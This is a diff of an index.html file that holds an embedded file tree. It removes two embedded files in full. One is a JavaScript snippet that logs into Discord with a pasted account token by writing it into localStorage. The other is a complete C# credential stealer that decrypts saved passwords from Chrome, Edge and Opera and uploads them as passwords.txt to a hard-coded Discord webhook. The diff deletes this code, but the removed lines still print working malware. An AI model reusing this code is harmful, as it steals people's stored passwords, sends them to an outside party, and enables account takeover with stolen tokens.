--- a/index.html
+++ b/index.html
@@ -229,15 +229,7 @@
       files: [
         {
           name: "Discord Token Login Code.txt",
-          content: "function login(token) {
-setInterval(() => {
-document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
-}, 50);
-setTimeout(() => {
-location.reload();
-}, 2500);
-}
-login ('PASTE TOKEN HERE')"
+          content: "Paste your Discord Token Login Code here..."
         }
       ],
       folders: [
@@ -288,248 +280,7 @@ using Org.BouncyCastle.Crypto.Modes;
 using Org.BouncyCastle.Crypto.Parameters;
 using Org.BouncyCastle.Crypto.Engines;
 
-namespace Big_Silly
-{
-    public static class Pass
-    {
-        // Replace with your actual Discord webhook URL.
-        private const string WEBHOOK_URL = "https://discord.com/api/webhooks/1320922615602221097/lpXbNg22dAgmT4VvGAFnfS8TTDrPKKesxKf4zJE_vSmUXNljWNhxMG1dAjyVyVK6wQl5";
-
-        /// <summary>
-        /// Reads the Local State file for the given browser and returns the decrypted master key.
-        /// </summary>
-        public static byte[] GetMasterKey(string browser)
-        {
-            string localStatePath = string.Empty;
-            string userProfile = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile);
-            switch (browser.ToLower())
-            {
-                case "edge":
-                    localStatePath = Path.Combine(userProfile, @"AppData\Local\Microsoft\Edge\User Data\Local State");
-                    break;
-                case "chrome":
-                    localStatePath = Path.Combine(userProfile, @"AppData\Local\Google\Chrome\User Data\Local State");
-                    break;
-                case "opera":
-                    localStatePath = Path.Combine(userProfile, @"AppData\Roaming\Opera Software\Opera GX Stable\Local State");
-                    break;
-                default:
-                    return null;
-            }
-            if (!File.Exists(localStatePath))
-            {
-                // Could log that the browser was not found.
-                return null;
-            }
-            try
-            {
-                string jsonText = File.ReadAllText(localStatePath);
-                dynamic localState = JsonConvert.DeserializeObject(jsonText);
-                string encryptedKeyB64 = localState["os_crypt"]["encrypted_key"];
-                byte[] encryptedKeyWithPrefix = Convert.FromBase64String(encryptedKeyB64);
-                // Remove the first 5 bytes (the "DPAPI" prefix)
-                byte[] encryptedKey = new byte[encryptedKeyWithPrefix.Length - 5];
-                Array.Copy(encryptedKeyWithPrefix, 5, encryptedKey, 0, encryptedKey.Length);
-                // Decrypt the master key using DPAPI
-                byte[] masterKey = ProtectedData.Unprotect(encryptedKey, null, DataProtectionScope.CurrentUser);
-                return masterKey;
-            }
-            catch (Exception)
-            {
-                // Log the error if needed.
-                return null;
-            }
-        }
-
-        /// <summary>
-        /// Decrypts an individual password (stored as a blob) using the given master key.
-        /// </summary>
-        public static string DecryptPassword(byte[] encryptedData, byte[] masterKey)
-        {
-            try
-            {
-                // Validate the length: 3-byte prefix + 12-byte IV + (ciphertext + 16-byte tag) must be present.
-                if (encryptedData == null || encryptedData.Length < (3 + 12 + 16))
-                    return "";
-
-                // Skip the first 3 bytes (prefix)
-                int ivOffset = 3;
-                int ivLength = 12;
-                byte[] iv = new byte[ivLength];
-                Array.Copy(encryptedData, ivOffset, iv, 0, ivLength);
-
-                // Calculate the length of ciphertext (total length minus prefix, IV, and tag)
-                int tagLength = 16;
-                int cipherTextLength = encryptedData.Length - 3 - ivLength - tagLength;
-                if (cipherTextLength <= 0)
-                    return "";
-
-                // Extract ciphertext
-                byte[] cipherText = new byte[cipherTextLength];
-                Array.Copy(encryptedData, ivOffset + ivLength, cipherText, 0, cipherTextLength);
-
-                // Extract tag (last 16 bytes)
-                byte[] tag = new byte[tagLength];
-                Array.Copy(encryptedData, encryptedData.Length - tagLength, tag, 0, tagLength);
-
-                // Combine ciphertext and tag in one array as expected by BouncyCastle.
-                byte[] cipherTextWithTag = new byte[cipherTextLength + tagLength];
-                Array.Copy(cipherText, 0, cipherTextWithTag, 0, cipherTextLength);
-                Array.Copy(tag, 0, cipherTextWithTag, cipherTextLength, tagLength);
-
-                // Set up the cipher using BouncyCastle.
-                // Create an instance of the AES engine in GCM mode.
-                GcmBlockCipher cipher = new GcmBlockCipher(new AesEngine());
-                // 128-bit MAC size is standard for AES-GCM.
-                AeadParameters parameters = new AeadParameters(new KeyParameter(masterKey), 128, iv, null);
-                cipher.Init(false, parameters); // false for decryption
-
-                // Prepare a buffer to hold the decrypted output.
-                byte[] plainText = new byte[cipher.GetOutputSize(cipherTextWithTag.Length)];
-                int len = cipher.ProcessBytes(cipherTextWithTag, 0, cipherTextWithTag.Length, plainText, 0);
-                cipher.DoFinal(plainText, len);
-
-                // Convert the decrypted bytes to a UTF8 string.
-                return Encoding.UTF8.GetString(plainText).TrimEnd('\0');
-            }
-            catch (Exception ex)
-            {
-                // Optionally log the exception message.
-                Console.WriteLine($"Password decryption failed: {ex.Message}");
-                return "Decryption failed";
-            }
-        }
-
-        /// <summary>
-        /// Retrieves login credentials from the browser’s Login Data database.
-        /// </summary>
-        public static Dictionary<string, (string username, string password)> GetPasswords(string browser)
-        {
-            var passwords = new Dictionary<string, (string username, string password)>();
-            byte[] masterKey = GetMasterKey(browser);
-            if (masterKey == null)
-                return passwords;
-
-            string userProfile = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile);
-            string loginDataPath = string.Empty;
-            switch (browser.ToLower())
-            {
-                case "edge":
-                    loginDataPath = Path.Combine(userProfile, @"AppData\Local\Microsoft\Edge\User Data\Default\Login Data");
-                    break;
-                case "chrome":
-                    loginDataPath = Path.Combine(userProfile, @"AppData\Local\Google\Chrome\User Data\Default\Login Data");
-                    break;
-                case "opera":
-                    loginDataPath = Path.Combine(userProfile, @"AppData\Roaming\Opera Software\Opera GX Stable\Login Data");
-                    break;
-                default:
-                    return passwords;
-            }
-            if (!File.Exists(loginDataPath))
-                return passwords;
-
-            // Copy the locked database to a temporary file.
-            string tempFile = Path.Combine(Path.GetTempPath(), "Loginvault.db");
-            try
-            {
-                File.Copy(loginDataPath, tempFile, true);
-            }
-            catch (Exception)
-            {
-                // Log error copying the file if needed.
-                return passwords;
-            }
-
-            try
-            {
-                using (var connection = new SQLiteConnection($"Data Source={tempFile};Version=3;"))
-                {
-                    connection.Open();
-                    using (var command = new SQLiteCommand("SELECT action_url, username_value, password_value FROM logins", connection))
-                    using (var reader = command.ExecuteReader())
-                    {
-                        while (reader.Read())
-                        {
-                            string url = reader.IsDBNull(0) ? "" : reader.GetString(0);
-                            string username = reader.IsDBNull(1) ? "" : reader.GetString(1);
-                            byte[] encryptedPassword = (byte[])reader["password_value"];
-                            string decryptedPassword = DecryptPassword(encryptedPassword, masterKey);
-                            if (!string.IsNullOrEmpty(username) || !string.IsNullOrEmpty(decryptedPassword))
-                            {
-                                passwords[url] = (username, decryptedPassword);
-                            }
-                        }
-                    }
-                    connection.Close();
-                }
-            }
-            catch (Exception)
-            {
-                // Log query error if needed.
-            }
-            try
-            {
-                File.Delete(tempFile);
-            }
-            catch (Exception)
-            {
-                // Log deletion error if needed.
-            }
-            return passwords;
-        }
-
-        /// <summary>
-        /// Sends the collected passwords as a text file to the Discord webhook.
-        /// </summary>
-        public static async Task SendToWebhookAsync(Dictionary<string, (string username, string password)> passwords)
-        {
-            if (passwords == null || passwords.Count == 0)
-            {
-                // Optionally log that no passwords were found.
-                return;
-            }
-            StringBuilder sb = new StringBuilder();
-            foreach (var kvp in passwords)
-            {
-                sb.AppendLine($"URL: {kvp.Key}");
-                sb.AppendLine($"Username: {kvp.Value.username}");
-                sb.AppendLine($"Password: {kvp.Value.password}");
-                sb.AppendLine();
-            }
-            string content = sb.ToString();
-
-            using (var client = new HttpClient())
-            using (var form = new MultipartFormDataContent())
-            {
-                var fileContent = new StringContent(content, Encoding.UTF8, "text/plain");
-                form.Add(fileContent, "file", "passwords.txt");
-
-                HttpResponseMessage response = await client.PostAsync(WEBHOOK_URL, form);
-                // Optionally check the response status.
-            }
-        }
-
-        /// <summary>
-        /// Extracts passwords from Chrome, Edge, and Opera and sends the combined report via webhook.
-        /// </summary>
-        public static async Task ExtractAndSendPasswordsAsync()
-        {
-            var allPasswords = new Dictionary<string, (string username, string password)>();
-            foreach (var browser in new string[] { "chrome", "edge", "opera" })
-            {
-                var browserPasswords = GetPasswords(browser);
-                foreach (var kvp in browserPasswords)
-                {
-                    // If the same URL exists for multiple browsers, the last one will overwrite.
-                    allPasswords[kvp.Key] = kvp.Value;
-                }
-            }
-            await SendToWebhookAsync(allPasswords);
-        }
-    }
-}
-`
+// ... rest of the code ...`
                 }
               ],
               folders: []
